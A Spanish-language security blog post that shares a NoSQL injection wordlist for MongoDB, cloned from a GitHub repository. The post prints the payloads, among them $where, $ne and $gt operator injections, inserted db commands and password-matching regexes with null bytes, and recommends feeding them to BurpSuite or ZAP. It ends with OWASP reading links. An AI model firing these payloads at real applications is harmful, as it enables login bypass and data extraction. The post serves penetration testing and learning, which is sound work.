Me encuentro realizando pruebas de seguridad ;), y me tope con una aplicación en MongoDB, en lo cual procedi a revisar si contaba con alguna vulnerabilidad viendo de manera tradicional las inyecciones SQL, asi que en este proceso me puse a revisar material de referencia, para lograr o tratar de llegar lo mas cerca posible a mi objetivo. 

En ello encontre lo primero un repositorio de cr0hn en el cual tiene payloads, para ataques de Inyección SQL contra noSQL MongoDB en este caso la instalación por decirlo asi basta con clonar y obtener los payloads de la siguiente manera o simplemente descargarlo.

snifer@root: git clone git@github.com:cr0hn/nosqlinjection\_wordlists.git 

El contenido del repositorio lo que llega a interesarnos son los payloads los cuales son:

true, $where: '1 == 1'  
, $where: '1 == 1'  
$where: '1 == 1'  
', $where: '1 == 1'  
1, $where: '1 == 1'  
{ $ne: 1 }  
', $or: \[ {}, { 'a':'a  
' } \], $comment:'successful MongoDB injection'  
db.injection.insert({success:1});  
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1  
|| 1==1  
' && this.password.match(/.\*/)//+%00  
' && this.passwordzz.match(/.\*/)//+%00  
'%20%26%26%20this.password.match(/.\*/)//+%00  
'%20%26%26%20this.passwordzz.match(/.\*/)//+%00  
{$gt: ''}  
\[$ne\]=1

Por si desean descargarlo, y aportar en el caso de contar con nuevos Payloads se hace en el repositorio respectivo, el uso de estos payloads puede ser en BurpSuite, ZAP solo como ejemplo de implementación asi que manos a la obra.

• Repositorio en Github

El material que me puse a leer y aun tengo como pendiente verlo a mas detalle es el siguiente el cual lo pille en la Wiki de Owasp llegando como referencia previo acceso al repositorio de Github, si tienen algun otro material y pueden compartir no duden en hacerlo en los comentarios y así enriquecemos esta entrada.

• Bryan Sullivan from Adobe: “Server-Side JavaScript Injection” 
• Bryan Sullivan from Adobe: “NoSQL, But Even Less Security”
• Erlend from Bekk Consulting: “[Security] NOSQL-injection” 
• Felipe Aragon from Syhunt: "NoSQL/SSJS Injection" 
• MongoDB Documentation: “How does MongoDB address SQL or Query injection?”
• PHP Documentation: “MongoCollection::find”  
• “Hacking NodeJS and MongoDB”
• “Attacking NodeJS and MongoDB”

La fuente donde obtuve los enlaces es la Wiki de OWASP Testing for NoSQL injection, en una próxima entrada nos pondremos a jugar con NoSQLMap el SQLMAP de las noSQL valga la redundancia del termino por si no se infiere.

《En algún lugar, algo increíble está esperando ser conocido.》 - Carl Sagan

Regards,
Snifer